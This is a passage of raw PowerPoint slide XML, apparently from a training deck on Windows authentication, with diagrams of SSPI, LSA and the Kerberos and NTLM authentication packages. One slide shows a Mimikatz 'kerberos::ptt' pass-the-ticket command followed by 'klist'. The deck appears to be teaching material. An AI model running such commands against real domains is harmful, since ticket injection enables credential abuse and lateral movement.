        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279842" y="4089266"/>
            <a:ext cx="7643866" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe "Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDB42A2-AD2F-46F3-936D-289D1F836004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276920" y="4113882"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D07946-6AE3-4E7B-8293-42EC8FC6BB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278338" y="4809346"/>
            <a:ext cx="7643866" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>klist</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16AF9D5A-D2C4-4785-B88E-8D1B96D63607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275416" y="4833962"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277262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P spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>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 Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ecurity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>upport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>rovider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>nterface</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4701604" y="792111"/>
            <a:ext cx="44069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274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSPI = Software interface that abstracts the client-server authentication process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network layer agnostic: delivers opaque tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provides quality of service guarantees (confidentiality,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	integrity, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The end result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establishing identity of the other party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-274320" defTabSz="914363">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establishing of a shared session key to be used by the application layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536575" y="1197570"/>
            <a:ext cx="1011238" cy="43338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GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1700807"/>
            <a:ext cx="576262" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 20000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="2277070"/>
            <a:ext cx="1008063" cy="4318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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GINA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1116013" y="2708870"/>
            <a:ext cx="0"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chemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="3285132"/>
            <a:ext cx="719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55" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1413470"/>
            <a:ext cx="719138" cy="489585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GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>LSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="3574057"/>
            <a:ext cx="1152525" cy="57467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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSV_1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="4221757"/>
            <a:ext cx="1152525" cy="57467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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="4869457"/>
            <a:ext cx="1152525" cy="57467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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Digest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="5517157"/>
            <a:ext cx="1152525" cy="5746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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Custom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3861395"/>
            <a:ext cx="3587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61" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="4509095"/>
            <a:ext cx="3587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62" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="5156795"/>
            <a:ext cx="3587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63" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="5806082"/>
            <a:ext cx="3587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64" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="1197570"/>
            <a:ext cx="1655763" cy="6477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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(e.g. Outlook Express)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3481218" y="2013813"/>
            <a:ext cx="576263" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 20000"/>
            </a:avLst>
          </a:prstGeom>
